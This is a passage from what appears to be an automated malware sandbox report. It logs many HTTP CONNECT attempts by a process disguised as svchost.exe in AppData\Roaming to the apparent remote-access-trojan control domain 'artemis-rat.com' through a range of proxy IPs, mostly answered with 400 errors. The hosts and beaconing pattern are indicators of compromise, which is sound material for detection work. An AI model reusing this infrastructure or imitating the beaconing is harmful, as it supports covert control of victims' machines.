                                                                                    Mar 9, 2024 13:14:31.993211985 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1996192.168.2.556256172.67.182.1078043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.424910069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.579117060 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1997192.168.2.555967172.232.111.2478043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.429131985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1998192.168.2.556263172.67.200.2208043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.431463003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.586078882 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1999192.168.2.556078101.255.208.170808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.431729078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2000192.168.2.556272104.17.66.698043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.438024998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.592559099 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2001192.168.2.556103110.12.211.1408043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.439544916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2002192.168.2.555654120.194.4.157544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.440649986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880213976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.177145004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.913188934 CET319INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 170
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2003192.168.2.556275104.18.237.1288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.442912102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.597249985 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2004192.168.2.556274104.21.85.2008043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.442989111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.597318888 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2005192.168.2.556195162.243.102.207976443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.447670937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2006192.168.2.556298104.20.179.1878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.455852985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.610264063 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2007192.168.2.556308172.67.187.2428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.467760086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.622140884 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2008192.168.2.556311104.16.241.2048043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.468298912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.622771025 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2009192.168.2.556098120.76.42.209888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.469324112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2010192.168.2.556148185.158.114.142569743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.485155106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2011192.168.2.55616195.164.89.123888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.493185997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.794482946 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2012192.168.2.55624792.204.136.1491669143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.495279074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.138165951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2013192.168.2.556091171.244.140.1604245643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.520066023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.301799059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.442971945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.833800077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.442961931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2014192.168.2.55653291.231.186.13344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.521639109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2015192.168.2.55653391.231.186.13344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.522329092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2016192.168.2.55653591.231.186.13344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.523026943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2017192.168.2.55653691.231.186.13344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.523907900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2018192.168.2.556122103.127.1.1308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.527411938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.921025991 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
